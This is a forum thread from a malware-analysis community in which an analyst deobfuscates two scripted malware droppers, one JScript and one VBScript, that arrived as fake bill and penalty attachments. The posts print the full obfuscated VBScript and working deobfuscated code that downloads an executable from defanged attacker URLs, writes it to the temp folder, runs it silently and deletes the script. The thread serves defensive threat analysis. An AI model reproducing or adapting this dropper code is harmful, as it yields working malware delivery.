Malware Analysis 2 fresh scripted samples from - 16-8-16-5.62456 - js , vbs

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From new Malware vault sample (Thanks to @Solarquest)

(1) AGL_bill.zip => AGL_bill.js

3/53
(when I posted)
https://www.virustotal.com/en/file/6d41e908becdca7028e62eba51b899912eb1a218217977d420c8fc19f1beaecf/analysis/
https://www.hybrid-analysis.com/sample/6d41e908becdca7028e62eba51b899912eb1a218217977d420c8fc19f1beaecf?environmentId=100

Because it uses a similar obfuscation method seen in another post,
this is a link to the deobfuscation method used :

https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/

Main difference : all vars and functions are in the try...catch part.

Deobfuscated script :

try {

if (oWS.StdIn.Column) { // return 1, a way to be sure the script is used on a Windows Script Host

oHttp = oWS.CreateObject("MSXML2.XMLHTTP");
oStream = oWS.
CreateObject("ADODB.Stream");
xrodukis3 = oFso.
GetSpecialFolder(2);
temp_file_name = oFso.
GetTempName();
useless_var= oHttp.
open("GET", "hxxp://gnhdd.com/templates/file.exe", 0);
useless_var= oHttp.
send();
oStream.
type= 1;
response = oHttp.
ResponseBody;
not_use = oWS.
ScriptFullName;
useless_var = oStream.
Open();
useless_var= oStream.
Write(response);
useless_var= oStream.
SaveToFile("%TEMP%\" + temp_file_name); // example : %TEMP%\rad92A53.tmp
useless_var= oStream.Close();
useless_var= oShell.run("
cmd.exe /c " + "%TEMP%" + temp_file_name, 0);
// example => C:\Users\DardiM\AppData\Local\Temp\rad92A53.tmp

}
} catch (e) {}

Same steps / explanations that I made in the the precedent thread linked

The payload : too fresh to be sure of is family (detection failed with Cuckoo)
Trojan.Win32.Yakes.qnkq by KTS 2017

https://www.virustotal.com/en/file/3af7e0b3e72359ab2106b99cdc20053c80ff820bd0a501d25cf9fd1bd5458f51/analysis/
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
(2) Penalty 233122912.vbs :

0/54
(when I posted)
Antivirus scan for a3ec02095428428c217982c0d7ede8c8d78ea2b79783fbbca8d8215d99ed5d5a at 2016-08-17 01:02:27 UTC - VirusTotal
https://www.hybrid-analysis.com/sample/a3ec02095428428c217982c0d7ede8c8d78ea2b79783fbbca8d8215d99ed5d5a?environmentId=100

Because it uses the similar obfuscation method seen in another post,
this is a link to the analysis => Part :
(2) 2.8.vbs

https://malwaretips.com/threads/downloaders-scripted-samples-from-malware-vault-1-8-16-13.61898/

1) Looking at the whole code

Script used : Visual Basic Script
Dim kzedgihbe2
Dim eweq, liqu, miptejwa9, yhjajnycr, jwabypu, bkycasi, jkenucmy, mebzuvyn, qjopko
Dim ugzuzcakj7, oxtigsy, czoklyw, mnuqxoh, ivez, xazibzavx, udqyzgenja, kbazamym, ejubigtu, ojegxygvi, echapu9
Dim rhowa, mdani
Dim ozyfo8, ehfaj, ukogl3, iduh5, mpoqbyfr0, kwavacky, ivpelxazx, lagu, oqnotp0, idzumguvc3, ohegq
Dim dodyrvu
Dim diqo
Dim bycfo4, snexusvu6, ononpyju, hejqoxi9, aqym, ejmypyk, ojase, qjaxte
Dim qasujut
Dim ydqarciwo, wukjaj, gorsy8, bvylfatwyqk3, avyv0, emofhodso1, utjobhejve3, vybigob
Dim gijmewwy
Dim lazfu6, pmires, atovf6, lxipgas
Dim mace2
Dim ibedmosli7
Dim esyrd7
Dim dunxamm
Dim nvajevwoq
function qucnikg ()
Dim ojyvava
ojyvava = Array ("anruhq", "kokzo", "rwuv", "eci", "ytz", "yp", "b.")(6)
qucnikg = ojyvava
End function
qasujut = " 0"
function ihrunam ()
Dim ankyjutn
ankyjutn = "of"
ihrunam = ankyjutn
End function
function esejs ()
Dim lyxafn
lyxafn = "St"
esejs = lyxafn
End function
qjopko = Array ("gma", "zeda", "ij", "ywqe", "ab", "eq")(5)
snexusvu6 = "GE"
oqnotp0 = Array ("aky", "mduth", "rg", "la", "ovet", "gani", "ypb")(2)
kbazamym = Array ("/b", "axib", "jda", "nwu", "xhute", "vus")(0)
function duxog ()
Dim xfazzegq
xfazzegq = Array ("fevge", "tumu", "ip", "gow", "jtopma", "pbebe", "rma")(2)
duxog = xfazzegq
End function
function kdyskifqo ()
Dim okyfbamy
okyfbamy = ".e"
kdyskifqo = okyfbamy
End function
miptejwa9 = "ip"
function irqemmape ()
Dim pqyjekqus
pqyjekqus = Array ("af", "re", "rjacsi", "vfih", "ko", "uh", "suka", "alo")(1)
irqemmape = pqyjekqus
End function
function mossi ()
Dim wnogo
wnogo = Array ("da", "ra", "osdyh", "zo", "uc", "zku", "ech", "kgyn")(0)
mossi = wnogo
End function
ibedmosli7 = Array ("nsa", "yry", "fyli", "em", "dpi", "ata", "ola")(3)
function cesuglac ()
Dim ikquxi
ikquxi = Array ("mu", "ty", "nalri", "uvo", "ib", "or", "bs", "iggi")(6)
cesuglac = ikquxi
End function
bvylfatwyqk3 = "/c"
function igatave ()
Dim wqinomy
wqinomy = "n "
igatave = wqinomy
End function
function mapi ()
Dim cynger
cynger = "/b"
mapi = cynger
End function
function vgagukydx ()
Dim ybyjz
ybyjz = "ru"
vgagukydx = ybyjz
End function
ojegxygvi = Array ("le", "wabci", "zulke", "bovu", "ok", "ogi")(0)
function ycoqwy ()
Dim ekcan
ekcan = "ri"
ycoqwy = ekcan
End function
function mexycozd ()
Dim ifkucuju
ifkucuju = "t."
mexycozd = ifkucuju
End function
ojase = Array ("ipp", "awpo", "je", "fyrxa", "ezizx", "etwibx")(2)
function qhaqerky ()
Dim ixpawlizro
ixpawlizro = "wi"
qhaqerky = ixpawlizro
End function
function ypase ()
Dim ugyhju
ugyhju = Array ("che", "asag", "ak", "ct", "jej", "sha", "sef")(3)
ypase = ugyhju
End function
kzedgihbe2 = "Sh"
echapu9 = Array ("nwi", "eq", "ilxyfq", "ublusr", "ejop", "t.")(5)
function gyttomi ()
Dim azil
azil = Array ("wly", "alte", "ra", "cju", "T", "smori", "dfy", "be")(4)
gyttomi = azil
End function
function achadeva ()
Dim rlonpajerc
rlonpajerc = Array ("uvk", "kbat", "ng", "iwasw", "tquca", "ggizs")(2)
achadeva = rlonpajerc
End function
function ybanass ()
Dim uberebe
uberebe = Array ("hicu", "nuxo", "saci", "ybdirp", "XM", "uv")(4)
ybanass = uberebe
End function
function sjeru ()
Dim ikuwnamz
ikuwnamz = "uj"
sjeru = ikuwnamz
End function
utjobhejve3 = Array ("unroqr", "khipa", "fizsy", "nbupi", "abnev", "tido", "gvetv", "wo")(7)
iduh5 = Array ("ry", "guv", "eq", "nja", "oplo", "ifka", "0,", "rywe")(6)
ivez = Array ("pu", "atdeg", "ubk", "ohridf", "epjyk", "thuqn")(0)


czoklyw = Array ("egs", "yhzu", "ysyr", "lN", "xov", "er")(3)
esyrd7 = "cr"
avyv0 = Array ("bu", "aje", "qoznu", "hmyp", "vmuhja", "qiz", "e")(6)
function ofpisxappi ()
Dim atypur
atypur = Array ("ytbelz", "lysi", "su", "hybr", "oxo", "losz", "Mi", "fdevxe")(6)
ofpisxappi = atypur
End function
diqo = Array ("cu", "tamc", "rzufr", "axosj", "temtu", "ul", "ewzi", "fafl")(5)


pmires = "eb"
rhowa = "ri"
bkycasi = "el"
function uleh ()
Dim apyrruwhu
apyrruwhu = "pt"
uleh = apyrruwhu
End function
function aloxsimjy ()
Dim rjulwuhxa
rjulwuhxa = Array ("obif", "fmemd", "itu", "hoxmy", "ep", "ace", "ri")(6)
aloxsimjy = rjulwuhxa
End function


dunxamm = ":/"
oxtigsy = "os"
function ltikoqxub ()
Dim jfetdamyt
jfetdamyt = Array ("osnixh", "mzuqfi", "rk", "edb", "pjivk", "uja")(2)
ltikoqxub = jfetdamyt
End function
function vodfy ()
Dim mgolum
mgolum = Array ("yxeng", "irz", "jryva", "ogc", "eme", "st", "uhde")(5)
vodfy = mgolum
End function
ohegq = Array ("atis", "il", "onso", "oqag", "za", "vo", "ylr")(5)
wukjaj = "ex"
function ironx ()
Dim sujsykritb
sujsykritb = Array ("in", "ale", "okta", "po", "etxoq", "cca")(0)
ironx = sujsykritb
End function


liqu = "l"
function lqatme ()
Dim ewfujud
ewfujud = " "
lqatme = ewfujud
End function
atovf6 = "TT"
function ubfuxnefi ()
Dim finjojsyss
finjojsyss = "xe"
ubfuxnefi = finjojsyss
End function
vybigob = Array ("icacq", "as", "idky", "ke", "ujivs", "sodr", "gekqu", "iz")(7)
function ixdegukwa ()
Dim thaxqeqo
thaxqeqo = ".o"
ixdegukwa = thaxqeqo
End function
function oxoxe ()
Dim xzavranbi
xzavranbi = Array ("Ad", "oshak", "obwaxh", "om", "ro", "fewi", "ynl", "sez")(0)
oxoxe = xzavranbi
End function
jkenucmy = Array ("xw", "ygw", "rogre", "atij", "idj", "uf", "ace")(0)
function adfikampu ()
Dim axzedf
axzedf = "tF"
adfikampu = axzedf
End function


function hazjofe ()
Dim ywjikwu
ywjikwu = "cr"
hazjofe = ywjikwu
End function
function zpitokw ()
Dim gapy
gapy = Array ("iny", "od", "ugrunr", "yjnyb", "qlepo", "ide", "yhlex", "qy")(1)
zpitokw = gapy
End function
ononpyju = Array ("sn", "kyxje", "ativ", "ewyw", "oxruvc", "ypre", "cwuzc")(0)
ivpelxazx = "m0"
gorsy8 = Array (" y", "ta", "abifw", "loqw", "ohi", "is", "gjyj", "ora")(0)
qjaxte = "0."


yhjajnycr = "ht"
ehfaj = Array ("ogx", "abmu", "awej", "qxuph", "mpyca", "zolp", "Fi")(6)
ydqarciwo = "ab"
ozyfo8 = Array ("ojva", "yzdy", "St", "ymjejd", "okhaqr", "mi", "apzi")(2)
function amxavafru ()
Dim jozkevrofj
jozkevrofj = Array ("ohe", "ga", "pbico", "ofecw", "eqewm", "qvilk", "qo", "cr")(7)
amxavafru = jozkevrofj
End function
ejubigtu = "am"
function evkanp ()
Dim bymi
bymi = "Ob"
evkanp = bymi
End function
function uftuxe ()
Dim cucsyvrodh
cucsyvrodh = Array ("qe", "cwan", "fbize", "ly", "uclu", "uj")(3)
uftuxe = cucsyvrodh
End function
idzumguvc3 = Array ("qy", "rmelti", "icgeb", "atuc", "ufu", "cuvdi", "am")(6)
jwabypu = Array ("yrucm", "xodka", "ffa", "ohb", "fd", "jiz", "ics")(4)
bycfo4 = "da"
hejqoxi9 = Array ("jvo", "e ", "yr", "ez", "fitby", "ufvyr", "ke")(1)
function uvqowcanza ()
Dim ywtivev
ywtivev = Array ("Sc", "he", "api", "unimw", "advy", "arbyjl")(0)
uvqowcanza = ywtivev
End function
function xwicnypo ()
Dim pusy
pusy = Array ("LH", "xvyvd", "acx", "uhxu", "akasd", "afcyfw", "oga")(0)
xwicnypo = pusy
End function
function rgomi ()
Dim udetxi
udetxi = "ta"
rgomi = udetxi
End function
function sugiz ()
Dim ysun
ysun = Array ("kbo", "enreqf", "te", "wiry", "tp", "edo")(4)
sugiz = ysun
End function
dodyrvu = Array ("vo", "dbice", "uxy", "St", "asrop", "vjo", "olo")(3)
function aboh ()
Dim pcizhycf
pcizhycf = "d."
aboh = pcizhycf
End function
function ofdac ()
Dim ewonnyta
ewonnyta = "le"
ofdac = ewonnyta
End function
aqym = Array ("ihzy", "WS", "zon", "htig", "kcik", "buzs")(1)
udqyzgenja = Array ("gyjly", "vur", "ewhuv", "cso", "Sy", "ydup")(4)
function civyl ()
Dim eprehr
eprehr = Array ("gd", "vdoku", "rdotu", "igqi", "vy", "tky")(0)
civyl = eprehr
End function
mnuqxoh = Array ("zi", "qzuwfy", "vcacri", "rdubf", "yjnuc", "avpi", ".S")(6)
function wybkisiw ()
Dim cmopyxx
cmopyxx = "ng"
wybkisiw = cmopyxx
End function
nvajevwoq = "P"
mebzuvyn = ejubigtu & avyv0
ejmypyk = oxoxe & zpitokw & qucnikg & ozyfo8 & irqemmape & idzumguvc3
xazibzavx = ydqarciwo & bycfo4 & ivpelxazx & mnuqxoh & amxavafru
lagu = qjopko & ohegq & mossi & rgomi & qjaxte & vgagukydx & igatave & vybigob & sjeru & uftuxe & ivez & yhkyri & gorsy8 & qhaqerky & jkenucmy & iduh5 & qasujut
emofhodso1 = aqym & esyrd7 & duxog & mexycozd & kzedgihbe2 & bkycasi & liqu
lazfu6 = qjefhewa & aboh & wukjaj & hejqoxi9 & bvylfatwyqk3 & lqatme
eweq = uvqowcanza & rhowa & uleh & ironx & wajqiqwun & ehfaj & ojegxygvi & udqyzgenja & vodfy & ibedmosli7 & evkanp & ojase & ypase
lxipgas = ofpisxappi & hazjofe & oxtigsy & ihrunam & echapu9 & ybanass & xwicnypo & atovf6 & nvajevwoq
ukogl3 = esejs & ycoqwy & wybkisiw
mace2 = miptejwa9 & adfikampu & diqo & czoklyw
ugzuzcakj7 = snexusvu6 & gyttomi
kwavacky = yhjajnycr & sugiz & dunxamm & mapi & pmires & rhijho & ofdac & ixdegukwa & oqnotp0 & kbazamym & jwabypu & hepbyw & civyl & feglegedv & cesuglac & ononpyju & utjobhejve3 & ltikoqxub & kdyskifqo & ubfuxnefi
mpoqbyfr0 = dodyrvu & aloxsimjy & achadeva
function nuzro ()
Dim mqivi
mqivi = 1
nuzro = mqivi
End function
mdani = 2
gijmewwy = 2
function uhpihmyz (esowsovu, abdam0)
if TypeName(abdam0.ScriptName) = mpoqbyfr0 then
Dim lidbeqli0, emiwilw
emiwilw = mace2
lidbeqli0 = Eval(xazibzavx& emiwilw &mebzuvyn)
esowsovu.deleteFile ( lidbeqli0 )
end if
End function
function qradopipd (eqvodata0, ywixw0, abdam0)
if TypeName(abdam0.ScriptName) = mpoqbyfr0 then
Dim izujlypu
izujlypu = lazfu6
Execute(lagu)
end if
End function
Dim ywixw0
Dim ojymlida8
Set abdam0 = WScript
Set fupi = CreateObject(lxipgas)
Set esowsovu = CreateObject(eweq)
Set ssafhimjo0 = esowsovu.GetSpecialFolder( mdani)
Set fjudqobjizc2 = CreateObject(ejmypyk)
Set eqvodata0 = CreateObject(emofhodso1)
ojymlida8 = esowsovu.GetTempName()
delimit = "\"
ywixw0 = ssafhimjo0 & delimit & ojymlida8
resso = ugzuzcakj7
fupi.Open resso, kwavacky, False
fupi.Send
fjudqobjizc2.Type = nuzro
fjudqobjizc2.Open
fjudqobjizc2.write fupi.responseBody
fjudqobjizc2.savetofile ywixw0, mdani
qradopipd eqvodata0, ywixw0, abdam0

uhpihmyz esowsovu, abdam0
This script only use vars and functions to build the right values at run time.

2) Looking at the end :

Dim ywixw0
Dim ojymlida8
Set abdam0 = WScript
Set fupi =
CreateObject(lxipgas)
Set esowsovu =
CreateObject(eweq)
Set ssafhimjo0 = esowsovu.
GetSpecialFolder( mdani)
Set fjudqobjizc2 =
CreateObject(ejmypyk)
Set eqvodata0 =
CreateObject(emofhodso1)
ojymlida8 = esowsovu.
GetTempName()
delimit = "
\"
ywixw0 = ssafhimjo0 & delimit & ojymlida8
resso = ugzuzcakj7
fupi.
Open resso, kwavacky, False
fupi.
Send
fjudqobjizc2.Type = nuzro
fjudqobjizc2.
Open
fjudqobjizc2.write fupi.responseBody
fjudqobjizc2.savetofile ywixw0, mdani
qradopipd eqvodata0, ywixw0, abdam0

uhpihmyz esowsovu, abdam0

This is where we have to begin deobfuscation steps from
Only var replacement by string / var content concatenations, tab of strings, basic functions
(see the above link to analogue obfuscation method already analyzed).

One example :

lxipgas = ofpisxappi & hazjofe & oxtigsy & ihrunam & echapu9 & ybanass & xwicnypo & atovf6 & nvajevwoq

function ofpisxappi ()
Dim atypur
atypur = Array ("ytbelz", "lysi", "su", "hybr", "oxo", "losz", "
Mi", "fdevxe")(6)
ofpisxappi = atypur
End function

function hazjofe ()
Dim ywjikwu
ywjikwu = "cr"
hazjofe = ywjikwu
End function

oxtigsy = "
os"

function ihrunam ()

Dim ankyjutn
ankyjutn = "of"
ihrunam = ankyjutn
End function


echapu9 = Array ("nwi", "eq", "ilxyfq", "ublusr", "ejop", "t.")(5)
function
ybanass ()
Dim uberebe
uberebe = Array ("hicu", "nuxo", "saci", "ybdirp", "XM", "uv")(4)
ybanass = uberebe
End function

function xwicnypo ()
Dim pusy
pusy = Array ("LH", "xvyvd", "acx", "uhxu", "akasd", "afcyfw", "oga")(0)
xwicnypo = pusy
End function

atovf6 = "TT"

nvajevwoq = "
P"

lxipgas
= "Microsoft.XMLHTTP"

All parts can be retrieve this way :

CreateObject(lxipgas) => CreateObject("Microsoft.XMLHTTP")
CreateObject(eweq) => CreateObject("Scripting.FileSystemObject")
esowsovu.
GetSpecialFolder( mdani) => esowsovu.
GetSpecialFolder( 2)
CreateObject("adodb.Stream")
CreateObject("WScript.Shell")
esowsovu.
GetTempName() => get a temp file name

3) Deobfuscated Script :

Set oWS = WScript
Set oHttp =
CreateObject("Microsoft.XMLHTTP") // to make the Http request
Set oFso = CreateObject("Scripting.FileSystemObject") // Manipulate path file name
Set path = oFso.GetSpecialFolder( 2) // "%TEMP%
Set oStream = CreateObject("adodb.Stream") // Stream to store responseBody
Set oShell = CreateObject("WScript.Shell") // Shell object
temp_file_nam = oFso.GetTempName() // example : rad350D6.tmp"
delimit = "\"

file_path = path & delimit & temp_file_nam //
%TEMP%\rad350D6.bmp

oHttp.Open "GET", "hxxp://bebelle.org/bfdt9gdz/bssnwork.exe" , false
oHttp.
Send
oStream.Type ='1
oStream.
Open
oStream.write oHttp.responseBody
oStream.savetofile file_path, 2

execute oShell, file_path, oWS
// execute the file

deleteScript oFso, oWS // delete the vbs Script

function execute(oShell, file_path, oWS)
if TypeName(oWS.ScriptName) = "String" then
Execute('oShell.run "cmd.exe /c " & "%TEMP%\rad350D6.bmp"', 0)
end if
End function

function deleteScript (oShell, oWS)

if TypeName(oWS.ScriptName) = "String" then
oShell.deleteFile ( Eval(oWS.
ScriptFullName ) )
end if
End function

4) Payload :

hxxp://bebelle.org/bfdt9gdz/bssnwork.exe

Crystal Security :

Hash: a880ef636030b53ce085edce602c0b28
Detections:
McAfee: Artemis!A880EF636030
Baidu: Win32.Trojan.WisdomEyes.151026.9950.9976
ESET-NOD32: a variant of Generik.MLIHWMQ
Avira: TR/Crypt.Xpack.dkwh
AhnLab-V3: Trojan/Win32.Inject.N2081829946
Rising: Malware.XPACK-LNR/Heur!1.5594
AVG: Generic37.CMAZ

Threat score: 14,3%
Overall: Unsafe

 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top